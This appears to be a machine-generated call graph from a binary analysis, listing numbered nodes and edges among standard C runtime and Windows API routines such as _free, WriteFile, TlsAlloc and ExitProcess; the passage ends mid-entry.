5408->5407 5410 8360be 5409->5410 5412 834869 _free 15 API calls 5409->5412 5413 8360d0 5410->5413 5414 834869 _free 15 API calls 5410->5414 5411->5409 5412->5410 5415 834869 _free 15 API calls 5413->5415 5417 8360e2 5413->5417 5414->5413 5415->5417 5416 836106 5420 836118 5416->5420 5422 834869 _free 15 API calls 5416->5422 5418 834869 _free 15 API calls 5417->5418 5421 8360f4 5417->5421 5418->5421 5419 834869 _free 15 API calls 5419->5416 5423 83612a 5420->5423 5424 834869 _free 15 API calls 5420->5424 5421->5416 5421->5419 5422->5420 5425 83613c 5423->5425 5427 834869 _free 15 API calls 5423->5427 5424->5423 5426 83614e 5425->5426 5428 834869 _free 15 API calls 5425->5428 5429 836160 5426->5429 5430 834869 _free 15 API calls 5426->5430 5427->5425 5428->5426 5431 834869 _free 15 API calls 5429->5431 5429->5432 5430->5429 5431->5432 5432->5382 5434 836183 5433->5434 5444 8361db 5433->5444 5435 834869 _free 15 API calls 5434->5435 5437 836193 5434->5437 5435->5437 5436 8361a5 5439 8361b7 5436->5439 5440 834869 _free 15 API calls 5436->5440 5437->5436 5438 834869 _free 15 API calls 5437->5438 5438->5436 5441 8361c9 5439->5441 5442 834869 _free 15 API calls 5439->5442 5440->5439 5443 834869 _free 15 API calls 5441->5443 5441->5444 5442->5441 5443->5444 5444->5385 5446 8366a5 5445->5446 5447 836687 5445->5447 5446->5401 5447->5446 5448 83621b __fassign 15 API calls 5447->5448 5449 83669f 5448->5449 5450 834869 _free 15 API calls 5449->5450 5450->5446 5451->5376 5484 836a82 5452->5484 5455 836b6f 5456 836b7b _abort 5455->5456 5461 836ba8 _abort 5456->5461 5462 836ba2 _abort 5456->5462 5498 8344a8 GetLastError 5456->5498 5458 836bf4 5459 8347f9 _free 15 API calls 5458->5459 5460 836bf9 5459->5460 5517 83473d 5460->5517 5466 836c20 5461->5466 5520 8356e2 EnterCriticalSection 5461->5520 5462->5458 5462->5461 5464 836bd7 _abort 5462->5464 5464->5309 5468 836c77 5466->5468 5470 836c7f 5466->5470 5477 836caa 5466->5477 5521 83572a LeaveCriticalSection 5466->5521 5472 833793 _abort 23 API calls 5468->5472 5470->5477 5522 836b66 5470->5522 5472->5470 5474 834424 _abort 33 API calls 5478 836d0d 5474->5478 5476 836b66 _abort 33 API calls 5476->5477 5525 836d2f 5477->5525 5478->5464 5479 834424 _abort 33 API calls 5478->5479 5479->5464 5481 83458f _abort 5480->5481 5482 8345bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 83468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 836a28 5484->5487 5486 833f29 5486->5309 5486->5455 5488 836a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 8356e2 EnterCriticalSection 5488->5493 5490 836a42 5494 836a76 5490->5494 5492 836a69 _abort 5492->5486 5493->5490 5497 83572a LeaveCriticalSection 5494->5497 5496 836a80 5496->5492 5497->5496 5499 8344c1 5498->5499 5500 8344c7 5498->5500 5501 835904 _abort 6 API calls 5499->5501 5502 83480c _abort 12 API calls 5500->5502 5504 83451e SetLastError 5500->5504 5501->5500 5503 8344d9 5502->5503 5505 8344e1 5503->5505 5507 83595a _abort 6 API calls 5503->5507 5506 834527 5504->5506 5508 834869 _free 12 API calls 5505->5508 5506->5462 5509 8344f6 5507->5509 5510 8344e7 5508->5510 5509->5505 5511 8344fd 5509->5511 5513 834515 SetLastError 5510->5513 5512 834296 _abort 12 API calls 5511->5512 5514 834508 5512->5514 5513->5506 5515 834869 _free 12 API calls 5514->5515 5516 83450e 5515->5516 5516->5504 5516->5513 5529 8346c2 5517->5529 5519 834749 5519->5464 5520->5466 5521->5468 5523 834424 _abort 33 API calls 5522->5523 5524 836b6b 5523->5524 5524->5476 5526 836d35 5525->5526 5528 836cfe 5525->5528 5541 83572a LeaveCriticalSection 5526->5541 5528->5464 5528->5474 5528->5478 5530 8344a8 _free 15 API calls 5529->5530 5531 8346d8 5530->5531 5532 8346e6 _ValidateLocalCookies 5531->5532 5537 83474d IsProcessorFeaturePresent 5531->5537 5532->5519 5534 83473c 5535 8346c2 _abort 21 API calls 5534->5535 5536 834749 5535->5536 5536->5519 5538 834758 5537->5538 5539 834573 _abort 3 API calls 5538->5539 5540 83476d GetCurrentProcess TerminateProcess 5539->5540 5540->5534 5541->5528 5542->5245 5546 83572a LeaveCriticalSection 5543->5546 5545 8352e1 5545->5245 5546->5545 5548 833f8f 5547->5548 5554 833f85 5547->5554 5549 834424 _abort 33 API calls 5548->5549 5548->5554 5550 833fb0 5549->5550 5555 8372d1 5550->5555 5554->5253 5554->5254 5556 8372e4 5555->5556 5557 833fc9 5555->5557 5556->5557 5563 836754 5556->5563 5559 8372fe 5557->5559 5560 837311 5559->5560 5561 837326 5559->5561 5560->5561 5562 835249 __fassign 33 API calls 5560->5562 5561->5554 5562->5561 5564 836760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 834424 _abort 33 API calls 5564->5565 5566 836769 5565->5566 5570 8367b7 _abort 5566->5570 5575 8356e2 EnterCriticalSection 5566->5575 5568 836787 5576 8367cb 5568->5576 5570->5557 5574 833f24 _abort 33 API calls 5574->5570 5575->5568 5577 83679b 5576->5577 5578 8367d9 __fassign 5576->5578 5580 8367ba 5577->5580 5578->5577 5579 836507 __fassign 15 API calls 5578->5579 5579->5577 5583 83572a LeaveCriticalSection 5580->5583 5582 8367ae 5582->5570 5582->5574 5583->5582 5588 834fd0 5584->5588 5591 83507a _ValidateLocalCookies 5584->5591 5586 835031 5604 837cd1 5586->5604 5592 83634d 5588->5592 5590 837cd1 38 API calls 5590->5591 5591->5269 5593 833f72 __fassign 33 API calls 5592->5593 5594 83636d MultiByteToWideChar 5593->5594 5596 8363ab 5594->5596 5602 836443 _ValidateLocalCookies 5594->5602 5597 8363cc _abort __alloca_probe_16 5596->5597 5599 8362ff 16 API calls 5596->5599 5598 83643d 5597->5598 5601 836411 MultiByteToWideChar 5597->5601 5609 83646a 5598->5609 5599->5597 5601->5598 5603 83642d GetStringTypeW 5601->5603 5602->5586 5603->5598 5605 833f72 __fassign 33 API calls 5604->5605 5606 837ce4 5605->5606 5613 837ab4 5606->5613 5608 835052 5608->5590 5610 836476 5609->5610 5611 836487 5609->5611 5610->5611 5612 834869 _free 15 API calls 5610->5612 5611->5602 5612->5611 5614 837acf 5613->5614 5615 837af5 MultiByteToWideChar 5614->5615 5616 837b1f 5615->5616 5618 837ca9 _ValidateLocalCookies 5615->5618 5617 837b40 __alloca_probe_16 5616->5617 5620 8362ff 16 API calls 5616->5620 5619 837b89 MultiByteToWideChar 5617->5619 5622 837bf5 5617->5622 5618->5608 5621 837ba2 5619->5621 5619->5622 5620->5617 5638 835a15 5621->5638 5624 83646a __freea 15 API calls 5622->5624 5624->5618 5625 837bb9 5625->5622 5626 837c04 5625->5626 5627 837bcc 5625->5627 5628 8362ff 16 API calls 5626->5628 5632 837c25 __alloca_probe_16 5626->5632 5627->5622 5629 835a15 6 API calls 5627->5629 5628->5632 5629->5622 5630 837c9a 5631 83646a __freea 15 API calls 5630->5631 5631->5622 5632->5630 5633 835a15 6 API calls 5632->5633 5634 837c79 5633->5634 5634->5630 5635 837c88 WideCharToMultiByte 5634->5635 5635->5630 5636 837cc8 5635->5636 5637 83646a __freea 15 API calls 5636->5637 5637->5622 5639 835741 _abort 5 API calls 5638->5639 5640 835a3c 5639->5640 5643 835a45 _ValidateLocalCookies 5640->5643 5644 835a9d 5640->5644 5642 835a85 LCMapStringW 5642->5643 5643->5625 5645 835741 _abort 5 API calls 5644->5645 5646 835ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 834d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 8356e2 EnterCriticalSection 5648->5655 5650 834d67 5656 834dbc 5650->5656 5654 834d80 _abort 5654->5283 5655->5650 5668 8354dc 5656->5668 5658 834e0a 5659 8354dc 21 API calls 5658->5659 5660 834e26 5659->5660 5661 8354dc 21 API calls 5660->5661 5662 834e44 5661->5662 5663 834d74 5662->5663 5664 834869 _free 15 API calls 5662->5664 5665 834d88 5663->5665 5664->5663 5682 83572a LeaveCriticalSection 5665->5682 5667 834d92 5667->5654 5669 8354ed 5668->5669 5673 8354e9 5668->5673 5670 8354f4 5669->5670 5675 835507 _abort 5669->5675 5671 8347f9 _free 15 API calls 5670->5671 5672 8354f9 5671->5672 5674 83473d _abort 21 API calls 5672->5674 5673->5658 5674->5673 5675->5673 5676 835535 5675->5676 5677 83553e 5675->5677 5678 8347f9 _free 15 API calls 5676->5678 5677->5673 5679 8347f9 _free 15 API calls 5677->5679 5680 83553a 5678->5680 5679->5680 5681 83473d _abort 21 API calls 5680->5681 5681->5673 5682->5667 5684 833f72 __fassign 33 API calls 5683->5684 5685 835571 5684->5685 5685->5075 5687 83356a _abort 5686->5687 5688 833582 5687->5688 5701 8336b8 GetModuleHandleW 5687->5701 5708 8356e2 EnterCriticalSection 5688->5708 5695 83358a 5697 8335ff _abort 5695->5697 5709 833c97 5695->5709 5696 833671 _abort 5696->5107 5712 833668 5697->5712 5702 833576 5701->5702 5702->5688 5703 8336fc GetModuleHandleExW 5702->5703 5704 833726 GetProcAddress 5703->5704 5705 83373b 5703->5705 5704->5705 5706 833758 _ValidateLocalCookies 5705->5706 5707 83374f FreeLibrary 5705->5707 5706->5688 5707->5706 5708->5695 5723 8339d0 5709->5723 5743 83572a LeaveCriticalSection 5712->5743 5714 833641 5714->5696 5715 833677 5714->5715 5744 835b1f 5715->5744 5717 833681 5718 8336a5 5717->5718 5719 833685 GetPEB 5717->5719 5721 8336fc _abort 3 API calls 5718->5721 5719->5718 5720 833695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 8336ad ExitProcess 5721->5722 5726 83397f 5723->5726 5725 8339f4 5725->5697 5727 83398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 8356e2 EnterCriticalSection 5727->5734 5729 833999 5735 833a20 5729->5735 5731 8339a6 5739 8339c4 5731->5739 5733 8339b7 _abort 5733->5725 5734->5729 5736 833a40 _ValidateLocalCookies 5735->5736 5737 833a48 5735->5737 5736->5731 5737->5736 5738 834869 _free 15 API calls 5737->5738 5738->5736 5742 83572a LeaveCriticalSection 5739->5742 5741 8339ce 5741->5733 5742->5741 5743->5714 5745 835b44 5744->5745 5747 835b3a _ValidateLocalCookies 5744->5747 5746 835741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6703 83324d 6704 83522b 46 API calls 6703->6704 6705 83325f 6704->6705 6714 83561e GetEnvironmentStringsW 6705->6714 6708 83326a 6710 834869 _free 15 API calls 6708->6710 6711 83329f 6710->6711 6712 833275 6713 834869 _free 15 API calls 6712->6713 6713->6708 6715 835635 6714->6715 6725 835688 6714->6725 6718 83563b WideCharToMultiByte 6715->6718 6716 835691 FreeEnvironmentStringsW 6717 833264 6716->6717 6717->6708 6726 8332a5 6717->6726 6719 835657 6718->6719 6718->6725 6720 8362ff 16 API calls 6719->6720 6721 83565d 6720->6721 6722 83567a 6721->6722 6723 835664 WideCharToMultiByte 6721->6723 6724 834869 _free 15 API calls 6722->6724 6723->6722 6724->6725 6725->6716 6725->6717 6727 8332ba 6726->6727 6728 83480c _abort 15 API calls 6727->6728 6738 8332e1 6728->6738 6729 833345 6730 834869 _free 15 API calls 6729->6730 6731 83335f 6730->6731 6731->6712 6732 83480c _abort 15 API calls 6732->6738 6733 833347 6735 833376 15 API calls 6733->6735 6736 83334d 6735->6736 6739 834869 _free 15 API calls 6736->6739 6737 833369 6740 83474d _abort 6 API calls 6737->6740 6738->6729 6738->6732 6738->6733 6738->6737 6741 834869 _free 15 API calls 6738->6741 6743 833eca 6738->6743 6739->6729 6742 833375 6740->6742 6741->6738 6744 833ed7 6743->6744 6745 833ee5 6743->6745 6744->6745 6750 833efc 6744->6750 6746 8347f9 _free 15 API calls 6745->6746 6747 833eed 6746->6747 6748 83473d _abort 21 API calls 6747->6748 6749 833ef7 6748->6749 6749->6738 6750->6749 6751 8347f9 _free 15 API calls 6750->6751 6751->6747 5815 836893 GetProcessHeap 6752 832f53 6753 832f62 6752->6753 6754 832f7e 6752->6754 6753->6754 6756 832f68 6753->6756 6755 83522b 46 API calls 6754->6755 6757 832f85 GetModuleFileNameA 6755->6757 6758 8347f9 _free 15 API calls 6756->6758 6760 832fa9 6757->6760 6759 832f6d 6758->6759 6761 83473d _abort 21 API calls 6759->6761 6775 833077 6760->6775 6762 832f77 6761->6762 6765 8331ec 15 API calls 6766 832fd3 6765->6766 6767 832fe8 6766->6767 6768 832fdc 6766->6768 6769 833077 33 API calls 6767->6769 6770 8347f9 _free 15 API calls 6768->6770 6772 832ffe 6769->6772 6774 832fe1 6770->6774 6771 834869 _free 15 API calls 6771->6762 6773 834869 _free 15 API calls 6772->6773 6772->6774 6773->6774 6774->6771 6777 83309c 6775->6777 6776 8355b6 33 API calls 6776->6777 6777->6776 6779 8330fc 6777->6779 6778 832fc6 6778->6765 6779->6778 6780 8355b6 33 API calls 6779->6780 6780->6779 6781 837351 6782 83735e 6781->6782 6783 83480c _abort 15 API calls 6782->6783 6784 837378 6783->6784 6785 834869 _free 15 API calls 6784->6785 6786 837384 6785->6786 6787 83480c _abort 15 API calls 6786->6787 6791 8373aa 6786->6791 6789 83739e 6787->6789 6788 8359b3 6 API calls 6788->6791 6790 834869 _free 15 API calls 6789->6790 6790->6791 6791->6788 6792 8373b6 6791->6792 5989 835fd0 5990 835fdc ___scrt_is_nonwritable_in_current_image 5989->5990 6001 8356e2 EnterCriticalSection 5990->6001 5992 835fe3 6002 835c8b 5992->6002 5994 835ff2 5995 836001 5994->5995 6015 835e64 GetStartupInfoW 5994->6015 6026 83601d 5995->6026 5999 836012 _abort 6001->5992 6003 835c97 ___scrt_is_nonwritable_in_current_image 6002->6003 6004 835ca4 6003->6004 6005 835cbb 6003->6005 6006 8347f9 _free 15 API calls 6004->6006 6029 8356e2 EnterCriticalSection 6005->6029 6008 835ca9 6006->6008 6009 83473d _abort 21 API calls 6008->6009 6011 835cb3 _abort 6009->6011 6010 835cf3 6037 835d1a 6010->6037 6011->5994 6014 835cc7 6014->6010 6030 835bdc 6014->6030 6016 835e81 6015->6016 6017 835f13 6015->6017 6016->6017 6018 835c8b 22 API calls 6016->6018 6021 835f1a 6017->6021 6019 835eaa 6018->6019 6019->6017 6020 835ed8 GetFileType 6019->6020 6020->6019 6022 835f21 6021->6022 6023 835f64 GetStdHandle 6022->6023 6024 835fcc 6022->6024 6025 835f77 GetFileType 6022->6025 6023->6022 6024->5995 6025->6022 6041 83572a LeaveCriticalSection 6026->6041 6028 836024 6028->5999 6029->6014 6031 83480c _abort 15 API calls 6030->6031 6032 835bee 6031->6032 6034 8359b3 6 API calls 6032->6034 6036 835bfb 6032->6036 6033 834869 _free 15 API calls 6035 835c4d 6033->6035 6034->6032 6035->6014 6036->6033 6040 83572a LeaveCriticalSection 6037->6040 6039 835d21 6039->6011 6040->6039 6041->6028 6200 837a10 6203 837a27 6200->6203 6204 837a35 6203->6204 6205 837a49 6203->6205 6206 8347f9 _free 15 API calls 6204->6206 6207 837a63 6205->6207 6208 837a51 6205->6208 6209 837a3a 6206->6209 6211 833f72 __fassign 33 API calls 6207->6211 6215 837a22 6207->6215 6210 8347f9 _free 15 API calls 6208->6210 6212 83473d _abort 21 API calls 6209->6212 6213 837a56 6210->6213 6211->6215 6212->6215 6214 83473d _abort 21 API calls 6213->6214 6214->6215 6216 837419 6226 837fb2 6216->6226 6220 837426 6239 83828e 6220->6239 6223 837450 6224 834869 _free 15 API calls 6223->6224 6225 83745b 6224->6225 6243 837fbb 6226->6243 6228 837421 6229 8381ee 6228->6229 6230 8381fa ___scrt_is_nonwritable_in_current_image 6229->6230 6263 8356e2 EnterCriticalSection 6230->6263 6232 838270 6277 838285 6232->6277 6234 83827c _abort 6234->6220 6235 838244 DeleteCriticalSection 6237 834869 _free 15 API calls 6235->6237 6238 838205 6237->6238 6238->6232 6238->6235 6264 83901c 6238->6264 6240 8382a4 6239->6240 6242 837435 DeleteCriticalSection 6239->6242 6241 834869 _free 15 API calls 6240->6241 6240->6242 6241->6242 6242->6220 6242->6223 6244 837fc7 ___scrt_is_nonwritable_in_current_image 6243->6244 6253 8356e2 EnterCriticalSection 6244->6253 6246 83806a 6258 83808a 6246->6258 6249 838076 _abort 6249->6228 6251 837fd6 6251->6246 6252 837f6b 61 API calls 6251->6252 6254 837465 EnterCriticalSection 6251->6254 6255 838060 6251->6255 6252->6251 6253->6251 6254->6251 6261 837479 LeaveCriticalSection 6255->6261 6257 838068 6257->6251 6262 83572a LeaveCriticalSection 6258->6262 6260 838091 6260->6249 6261->6257 6262->6260 6263->6238 6265 839028 ___scrt_is_nonwritable_in_current_image 6264->6265 6266 839039 6265->6266 6267 83904e 6265->6267 6268 8347f9 _free 15 API calls 6266->6268 6276 839049 _abort 6267->6276 6280 837465 EnterCriticalSection 6267->6280 6270 83903e 6268->6270 6272 83473d _abort 21 API calls 6270->6272 6271 83906a 6281 838fa6 6271->6281 6272->6276 6274 839075 6297 839092 6274->6297 6276->6238 6535 83572a LeaveCriticalSection 6277->6535 6279 83828c 6279->6234 6280->6271 6282 838fb3 6281->6282 6283 838fc8 6281->6283 6284 8347f9 _free 15 API calls 6282->6284 6289 838fc3 6283->6289 6300 837f05 6283->6300 6285 838fb8 6284->6285 6287 83473d _abort 21 API calls 6285->6287 6287->6289 6289->6274 6290 83828e 15 API calls 6291 838fe4 6290->6291 6306 83732b 6291->6306 6293 838fea 6313 839d4e 6293->6313 6296 834869 _free 15 API calls 6296->6289 6534 837479 LeaveCriticalSection 6297->6534 6299 83909a 6299->6276 6301 837f1d 6300->6301 6302 837f19 6300->6302 6301->6302 6303 83732b 21 API calls 6301->6303 6302->6290 6304 837f3d 6303->6304 6328 8389a7 6304->6328 6307 837337 6306->6307 6308 83734c 6306->6308 6309 8347f9 _free 15 API calls 6307->6309 6308->6293 6310 83733c 6309->6310 6311 83473d _abort 21 API calls 6310->6311 6312 837347 6311->6312 6312->6293 6314 839d5d 6313->6314 6319 839d72 6313->6319 6315 8347e6 __dosmaperr 15 API calls 6314->6315 6318 839d62 6315->6318 6316 839dad 6317 8347e6 __dosmaperr 15 API calls 6316->6317 6320 839db2 6317->6320 6321 8347f9 _free 15 API calls 6318->6321 6319->6316 6322 839d99 6319->6322 6323 8347f9 _free 15 API calls 6320->6323 6326 838ff0 6321->6326 6491 839d26 6322->6491 6325 839dba 6323->6325 6327 83473d _abort 21 API calls 6325->6327 6326->6289 6326->6296 6327->6326 6329 8389b3 ___scrt_is_nonwritable_in_current_image 6328->6329 6330 8389d3 6329->6330 6331 8389bb 6329->6331 6333 838a71 6330->6333 6338 838a08 6330->6338 6353 8347e6 6331->6353 6335 8347e6 __dosmaperr 15 API calls 6333->6335 6337 838a76 6335->6337 6336 8347f9 _free 15 API calls 6339 8389c8 _abort 6336->6339 6340 8347f9 _free 15 API calls 6337->6340 6356 835d23 EnterCriticalSection 6338->6356 6339->6302 6342 838a7e 6340->6342 6344 83473d _abort 21 API calls 6342->6344 6343 838a0e 6345 838a2a 6343->6345 6346 838a3f 6343->6346 6344->6339 6348 8347f9 _free 15 API calls 6345->6348 6357 838a92 6346->6357 6349 838a2f 6348->6349 6351 8347e6 __dosmaperr 15 API calls 6349->6351 6350 838a3a 6406 838a69 6350->6406 6351->6350 6354 8344a8 _free 15 API calls 6353->6354 6355 8347eb 6354->6355 6355->6336 6356->6343 6358 838ac0 6357->6358 6364 838ab9 _ValidateLocalCookies 6357->6364 6359 838ae3 6358->6359 6360 838ac4 6358->6360 6362 838b17 6359->6362 6363 838b34 6359->6363 6361 8347e6 __dosmaperr 15 API calls 6360->6361 6365 838ac9 6361->6365 6366 8347e6 __dosmaperr 15 API calls 6362->6366 6368 838b4a 6363->6368 6409 838f8b 6363->6409 6364->6350 6367 8347f9 _free 15 API calls 6365->6367 6369 838b1c 6366->6369 6370 838ad0 6367->6370 6412 838637 6368->6412 6373 8347f9 _free 15 API calls 6369->6373 6374 83473d _abort 21 API calls 6370->6374 6376 838b24 6373->6376 6374->6364 6381 83473d _abort 21 API calls 6376->6381 6377 838b91 6382 838ba5 6377->6382 6383 838beb WriteFile 6377->6383 6378 838b58 6379 838b7e 6378->6379 6380 838b5c 6378->6380 6424 838417 GetConsoleCP 6379->6424 6390 838c52 6380->6390 6419 8385ca 6380->6419 6381->6364 6386 838bdb 6382->6386 6387 838bad 6382->6387 6385 838c0e GetLastError 6383->6385 6395 838b74 6383->6395 6385->6395 6444 8386ad 6386->6444 6391 838bb2 6387->6391 6392 838bcb 6387->6392 6390->6364 6394 8347f9 _free 15 API calls 6390->6394 6391->6390 6433 83878c 6391->6433 6438 83887a 6392->6438 6396 838c77 6394->6396 6395->6364 6395->6390 6397 838c2e 6395->6397 6399 8347e6 __dosmaperr 15 API calls 6396->6399 6400 838c35 6397->6400 6401 838c49 6397->6401 6399->6364 6403 8347f9 _free 15 API calls 6400->6403 6449 8347c3 6401->6449 6404 838c3a 6403->6404 6405 8347e6 __dosmaperr 15 API calls 6404->6405 6405->6364 6490 835d46 LeaveCriticalSection 6406->6490 6408 838a6f 6408->6339 6454 838f0d 6409->6454 6476 837eaf 6412->6476 6414 838647 6415 83864c 6414->6415 6416 834424 _abort 33 API calls 6414->6416 6415->6377 6415->6378 6417 83866f 6416->6417 6417->6415 6418 83868d GetConsoleMode 6417->6418 6418->6415 6422 838624 6419->6422 6423 8385ef 6419->6423 6420 838626 GetLastError 6420->6422 6421 839101 WriteConsoleW CreateFileW 6421->6423 6422->6395 6423->6420 6423->6421 6423->6422 6426 83858c _ValidateLocalCookies 6424->6426 6428 83847a 6424->6428 6426->6395 6427 8372b7 35 API calls __fassign 6427->6428 6428->6426 6428->6427 6429 838500 WideCharToMultiByte 6428->6429 6432 838557 WriteFile 6428->6432 6485 836052 6428->6485 6429->6426 6430 838526 WriteFile 6429->6430 6430->6428 6431 8385af GetLastError 6430->6431 6431->6426 6432->6428 6432->6431 6434 83879b 6433->6434 6435 83885d _ValidateLocalCookies 6434->6435 6436 838819 WriteFile 6434->6436 6435->6395 6436->6434 6437 83885f GetLastError 6436->6437 6437->6435 6443 838889 6438->6443 6439 838994 _ValidateLocalCookies 6439->6395 6440 83890b WideCharToMultiByte 6441 838940 WriteFile 6440->6441 6442 83898c GetLastError 6440->6442 6441->6442 6441->6443 6442->6439 6443->6439 6443->6440 6443->6441 6447 8386bc 6444->6447 6445 83872e WriteFile 6445->6447 6448 838771 GetLastError 6445->6448 6446 83876f _ValidateLocalCookies 6446->6395 6447->6445 6447->6446 6448->6446 6450 8347e6 __dosmaperr 15 API calls 6449->6450 6451 8347ce _free 6450->6451 6452 8347f9 _free 15 API calls 6451->6452 6453 8347e1 6452->6453 6453->6364 6463 835dfa 6454->6463 6456 838f1f 6457 838f27 6456->6457 6458 838f38 SetFilePointerEx 6456->6458 6459 8347f9 _free 15 API calls 6457->6459 6460 838f50 GetLastError 6458->6460 6461 838f2c 6458->6461 6459->6461 6462 8347c3 __dosmaperr 15 API calls 6460->6462 6461->6368 6462->6461 6464 835e07 6463->6464 6465 835e1c 6463->6465 6466 8347e6 __dosmaperr 15 API calls 6464->6466 6467 8347e6 __dosmaperr 15 API calls 6465->6467 6469 835e41 6465->6469 6468 835e0c 6466->6468 6470 835e4c 6467->6470 6471 8347f9 _free 15 API calls 6468->6471 6469->6456 6472 8347f9 _free 15 API calls 6470->6472 6473 835e14 6471->6473 6474 835e54 6472->6474 6473->6456 6475 83473d _abort 21 API calls 6474->6475 6475->6473 6477 837ebc 6476->6477 6479 837ec9 6476->6479 6478 8347f9 _free 15 API calls 6477->6478 6480 837ec1 6478->6480 6481 837ed5 6479->6481 6482 8347f9 _free 15 API calls 6479->6482 6480->6414 6481->6414 6483 837ef6 6482->6483 6484 83473d _abort 21 API calls 6483->6484 6484->6480 6486 834424 _abort 33 API calls 6485->6486 6487 83605d 6486->6487 6488 8372d1 __fassign 33 API calls 6487->6488 6489 83606d 6488->6489 6489->6428 6490->6408 6494 839ca4 6491->6494 6493 839d4a 6493->6326 6495 839cb0 ___scrt_is_nonwritable_in_current_image 6494->6495 6505 835d23 EnterCriticalSection 6495->6505 6497 839cbe 6498 839cf0 6497->6498 6499 839ce5 6497->6499 6501 8347f9 _free 15 API calls 6498->6501 6506 839dcd 6499->6506 6502 839ceb 6501->6502 6521 839d1a 6502->6521 6504 839d0d _abort 6504->6493 6505->6497 6507 835dfa 21 API calls 6506->6507 6508 839ddd 6507->6508 6509 839de3 6508->6509 6511 835dfa 21 API calls 6508->6511 6520 839e15 6508->6520 6524 835d69 6509->6524 6514 839e0c 6511->6514 6512 835dfa 21 API calls 6515 839e21 CloseHandle 6512->6515 6517 835dfa 21 API calls 6514->6517 6515->6509 6518 839e2d GetLastError 6515->6518 6516 839e5d 6516->6502 6517->6520 6518->6509 6519 8347c3 __dosmaperr 15 API calls 6519->6516 6520->6509 6520->6512 6533 835d46 LeaveCriticalSection 6521->6533 6523 839d24 6523->6504 6525 835ddf 6524->6525 6528 835d78 6524->6528 6526 8347f9 _free 15 API calls 6525->6526 6527 835de4 6526->6527 6529 8347e6 __dosmaperr 15 API calls 6527->6529 6528->6525 6532 835da2 6528->6532 6530 835dcf 6529->6530 6530->6516 6530->6519 6531 835dc9 SetStdHandle 6531->6530 6532->6530 6532->6531 6533->6523 6534->6299 6535->6279 6793 83365d 6794 833e89 33 API calls 6793->6794 6795 833665 6794->6795 6536 837d1c 6537 83522b 46 API calls 6536->6537 6538 837d21 6537->6538 5816 8356a1 5817 8356ac 5816->5817 5819 8356d5 5817->5819 5820 8356d1 5817->5820 5822 8359b3 5817->5822 5827 8356f9 5819->5827 5823 835741 _abort 5 API calls 5822->5823 5824 8359da 5823->5824 5825 8359e3 _ValidateLocalCookies 5824->5825 5826 8359f8 InitializeCriticalSectionAndSpinCount 5824->5826 5825->5817 5826->5825 5828 835725 5827->5828 5829 835706 5827->5829 5828->5820 5830 835710 DeleteCriticalSection 5829->5830 5830->5828 5830->5830 6042 838ce1 6043 838d01 6042->6043 6046 838d38 6043->6046 6045 838d2b 6047 838d3f 6046->6047 6048 838da0 6047->6048 6050 838d5f 6047->6050 6049 839997 16 API calls 6048->6049 6051 83988e 6048->6051 6052 838dee 6049->6052 6050->6051 6053 839997 16 API calls 6050->6053 6051->6045 6052->6045 6054 8398be 6053->6054 6054->6045 6796 839160 6799 83917e 6796->6799 6798 839176 6803 839183 6799->6803 6800 8399d3 16 API calls 6802 8393af 6800->6802 6801 839218 6801->6798 6802->6798 6803->6800 6803->6801 5831 835ba6 5832 835bd7 5831->5832 5834 835bb1 5831->5834 5833 835bc1 FreeLibrary 5833->5834 5834->5832 5834->5833 6539 836026 6540 83602b 6539->6540 6542 83604e 6540->6542 6543 835c56 6540->6543 6544 835c63 6543->6544 6545 835c85 6543->6545 6546 835c71 DeleteCriticalSection 6544->6546 6547 835c7f 6544->6547 6545->6540 6546->6546 6546->6547 6548 834869 _free 15 API calls 6547->6548 6548->6545 6055 8333e5 6056 8333f7 6055->6056 6057 8333fd 6055->6057 6059 833376 6056->6059 6060 833383 6059->6060 6064 8333a0 6059->6064 6061 83339a 6060->6061 6063 834869 _free 15 API calls 6060->6063 6062 834869 _free 15 API calls 6061->6062 6062->6064 6063->6060 6064->6057 6065 839beb 6066 839c04 __startOneArgErrorHandling 6065->6066 6068 839c2d __startOneArgErrorHandling 6066->6068 6069 83a1c4 6066->6069 6070 83a1fd __startOneArgErrorHandling 6069->6070 6071 83a495 __raise_exc RaiseException 6070->6071 6072 83a224 __startOneArgErrorHandling 6070->6072 6071->6072 6073 83a267 6072->6073 6075 83a242 6072->6075 6074 83a786 __startOneArgErrorHandling 15 API calls 6073->6074 6077 83a262 __startOneArgErrorHandling _ValidateLocalCookies 6074->6077 6078 83a7b5 6075->6078 6077->6068 6079 83a7c4 6078->6079 6080 83a838 __startOneArgErrorHandling 6079->6080 6082 83a7e3 __startOneArgErrorHandling 6079->6082 6081 83a786 __startOneArgErrorHandling 15 API calls 6080->6081 6084 83a831 6081->6084 6083 83a786 __startOneArgErrorHandling 15 API calls 6082->6083 6082->6084 6083->6084 6084->6077 6549 83142e 6552 832cf0 6549->6552 6551 83143f 6553 8344a8 _free 15 API calls 6552->6553 6554 832d07 _ValidateLocalCookies 6553->6554 6554->6551 6555 83452d 6563 835858 6555->6563 6557 834537 6558 8344a8 _free 15 API calls 6557->6558 6562 834541 6557->6562 6559 834549 6558->6559 6560 834556 6559->6560 6568 834559 6559->6568 6564 835741 _abort 5 API calls 6563->6564 6565 83587f 6564->6565 6566 835897 TlsAlloc 6565->6566 6567 835888 _ValidateLocalCookies 6565->6567 6566->6567 6567->6557 6569 834563 6568->6569 6570 834569 6568->6570 6572 8358ae 6569->6572 6570->6562 6573 835741 _abort 5 API calls 6572->6573 6574 8358d5 6573->6574 6575 8358e1 _ValidateLocalCookies 6574->6575 6576 8358ed TlsFree 6574->6576 6575->6570 6576->6575 6085 838df1 6086 838e15 6085->6086 6087 838e2e 6086->6087 6090 839beb __startOneArgErrorHandling 6086->6090 6091 838e78 6087->6091 6093 8399d3 6087->6093 6088 839c2d __startOneArgErrorHandling 6090->6088 6092 83a1c4 16 API calls 6090->6092 6092->6088 6094 8399f0 DecodePointer 6093->6094 6095 839a00 6093->6095 6094->6095 6096 839a8d 6095->6096 6097 839a82 _ValidateLocalCookies 6095->6097 6099 839a37 6095->6099 6096->6097 6098 8347f9 _free 15 API calls 6096->6098 6097->6091 6098->6097 6099->6097 6100 8347f9 _free 15 API calls 6099->6100 6100->6097 6804 837570 6805 8375a9 6804->6805 6806 